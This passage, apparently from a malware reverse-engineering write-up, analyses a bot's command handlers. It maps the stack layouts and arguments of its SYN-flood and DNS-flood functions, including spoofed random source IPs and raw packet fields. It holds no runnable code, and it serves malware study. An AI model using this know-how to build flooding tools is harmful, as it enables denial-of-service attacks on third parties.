I tried to understand the meaning of flag, but I failed. It appears to influence the number of iteratione before gethostbyname is called again, but since you can only specify one byte, this does not make a lot of a difference. Case 10: Like case 9, but calls another function (8049d40), which I'll call do_syn_flood. Also, argument 13 of that function is always passed as zero. 8049d40: do_syn_flood() 80678b0: "%u.%u.%u.%u" This function takes a whopping 14 arguments. If arg13 is zero, the first four are the destination IP, otherwise gethostbyname is run on the 14th argument (buf) and the result is used as destination IP. If arg7 is zero, the source IP is random, otherwise it is arguments 8 to 11. arg5 and arg6 are the upper and higher bytes of the TCP destination port. arg12 is analogous to flag in do_flood, i.e. I don't know ;) do_syn_flood/0x8: char arg1 do_syn_flood/0xc: char arg2 do_syn_flood/0x10: char arg3 do_syn_flood/0x14: char arg4 do_syn_flood/0x18: char arg5 do_syn_flood/0x1c: char arg6 do_syn_flood/0x20: char arg7 do_syn_flood/0x24: char arg8 do_syn_flood/0x28: char arg9 do_syn_flood/0x2c: char arg10 do_syn_flood/0x30: char arg11 do_syn_flood/0x34: char arg12 do_syn_flood/0x38: char arg13 do_syn_flood/0x3c: char* buf do_syn_flood/0xffffff5c: copy of arg1 do_syn_flood/0xffffff58: copy of arg2 do_syn_flood/0xffffff54: copy of arg3 do_syn_flood/0xffffff38: copy of arg4 do_syn_flood/0xffffff50: copy of arg8 do_syn_flood/0xffffff4c: copy of arg9 do_syn_flood/0xffffff48: copy of arg10 do_syn_flood/0xffffff44: copy of arg11 do_syn_flood/0xfffffff0: sockaddr_in si do_syn_flood/0xffffff88: sprintf_scratch_buf[32] do_syn_flood/0xffffffc8: packet.ip_hdr do_syn_flood/0xffffff40: raw_sock do_syn_flood/0xffffff68: sprintf_scratch_buf2[32] do_syn_flood/0xffffffa8: somestruct.int0 (init source_ip) do_syn_flood/0xffffffac: somestruct.int4 (init dest_ip) do_syn_flood/0xffffffb0: somestruct.char8 (init 0) do_syn_flood/0xffffffb1: somestruct.char9 (init 6) do_syn_flood/0xffffffb2: somestruct.short10 (init htons(20)==0x1400) do_syn_flood/0xffffffb4: copy-of-tcp-header do_syn_flood/0xffffffc8: packet.ip.version,ihl do_syn_flood/0xffffffc9: packet.ip.tos do_syn_flood/0xffffffca: packet.ip.tot_len do_syn_flood/0xffffffcc: packet.ip.id do_syn_flood/0xffffffce: packet.ip.frag_off do_syn_flood/0xffffffd0: packet.ip.ttl do_syn_flood/0xffffffd1: packet.ip.protocol do_syn_flood/0xffffffd2: packet.ip.checksum do_syn_flood/0xffffffd4: packet.ip.source_ip do_syn_flood/0xffffffd8: packet.ip.dest_ip do_syn_flood/0xffffffdc: packet.tcp.sourceport do_syn_flood/0xffffffde: packet.tcp.destport do_syn_flood/0xffffffe0: packet.tcp.sequence_number do_syn_flood/0xffffffe4: packet.tcp.ack do_syn_flood/0xffffffe8: packet.tcp.flags res1,doff do_syn_flood/0xffffffe9: packet.tcp.flags cwr,ece,urg,ack,psh,rst,syn,fin do_syn_flood/0xffffffea: packet.tcp.window do_syn_flood/0xffffffec: packet.tcp.checksum do_syn_flood/0xffffffee: packet.tcp.urg_ptr do_syn_flood/0xfffffff0: sockaddr_in si.sin_family do_syn_flood/0xfffffff2: sockaddr_in si.sin_port do_syn_flood/0xfffffff4: sockaddr_in si.sin_addr do_syn_flood/0xffffff62: checksum accumulator temp Case 11: Same as case 10, except that you can set arg13/flag. Case 12: Looks familiar (like 4, 9, 10 and 11), but it calls a new function (8049564). 8049564: do_other_dns_flood() do_other_dns_flood takes 13 arguments, 1-12 again char, 13 a char* to the rest of the decrypted buffer. The first four arguments are the destination IP, if usehostname is zero. If arg5-arg8 are all zero, the source IP is random (no 255s), otherwise it's arg5-arg8. This time, arg9 plays the role of the mysterious "flag". arg10 and arg11 are again taken as UDP source port, and the destination port is set to htons(53), i.e. DNS. In this function, there some very bizarre code: "mov %ebp,0xfffff978(%ebp)" and then later "mov 0xfffff978(%ebp),%edx" and "add $0xfffffde8,%edx". I have never seen gcc generate code like this to access a local variable on the stack. Maybe the code is using nested functions or variable length array or so. This confuses my annotation perl script, though :-( The code again randomizes the DNS sequence number. What's the difference between do_flood and this function? This function does not use the list of public DNS servers, the destination IP is one of the parameters. There are also subtle differences in implementation. The random source IP number is generated by writing the results of random() to the IP itself instead of going through sprintf and inet_addr, so maybe this is the author's testbed on the search for a cleaner implementation of do_flood()? do_other_dns_flood/0x8: char arg1 (destip[0]) do_other_dns_flood/0xc: char arg2 (destip[1]) do_other_dns_flood/0x10: char arg3 (destip[2]) do_other_dns_flood/0x14: char arg4 (destip[3]) do_other_dns_flood/0x18: char arg5 (srcip[0]) do_other_dns_flood/0x1c: char arg6 (srcip[1]) do_other_dns_flood/0x20: char arg7 (srcip[2]) do_other_dns_flood/0x24: char arg8 (srcip[3]) do_other_dns_flood/0x28: char mysterious_flag do_other_dns_flood/0x2c: char arg10 (srcport[0]) do_other_dns_flood/0x30: char arg11 (srcport[1]) do_other_dns_flood/0x34: char usehostname do_other_dns_flood/0x38: char* hostname do_other_dns_flood/0xfffff9ac: copy of arg1 do_other_dns_flood/0xfffff9a8: copy of arg2 do_other_dns_flood/0xfffff9a4: copy of arg3 do_other_dns_flood/0xfffff9a0: copy of arg4 do_other_dns_flood/0xfffff99c: copy of arg5 do_other_dns_flood/0xfffff998: copy of arg6 do_other_dns_flood/0xfffff994: copy of arg7 do_other_dns_flood/0xfffff990: copy of arg8 do_other_dns_flood/0xffffffdc: copy of dnslen[] do_other_dns_flood/0xfffffde8: copy of dnstab[] do_other_dns_flood/0xfffffdd8: sockaddr_in in.sin_family do_other_dns_flood/0xfffffdda: sockaddr_in in.sin_port do_other_dns_flood/0xfffffddc: sockaddr_in in.sin_addr do_other_dns_flood/0xfffff98c: int raw_sock do_other_dns_flood/0xfffff9d8: packet.ip.version,ihl do_other_dns_flood/0xfffff9d9: packet.ip.tos do_other_dns_flood/0xfffff9da: packet.ip.tot_len do_other_dns_flood/0xfffff9dc: packet.ip.id do_other_dns_flood/0xfffff9de: packet.ip.frag_off do_other_dns_flood/0xfffff9e0: packet.ip.ttl do_other_dns_flood/0xfffff9e1: packet.ip.protocol do_other_dns_flood/0xfffff9e2: packet.ip.checksum do_other_dns_flood/0xfffff9e4: packet.ip.source_ip do_other_dns_flood/0xfffff9e8: packet.ip.dest_ip do_other_dns_flood/0xfffff9ec: packet.udp.sourceport do_other_dns_flood/0xfffff9ee: packet.udp.destport do_other_dns_flood/0xfffff9f0: packet.udp.len do_other_dns_flood/0xfffff9f2: packet.udp.checksum do_other_dns_flood/0xfffff9f4: packet.payload do_other_dns_flood/0xfffff9d8: sprintf buf for arg1-arg4 do_other_dns_flood/0xfffff988: pointer to packet.udp.sourceport do_other_dns_flood/0xfffff984: pointer to packet.payload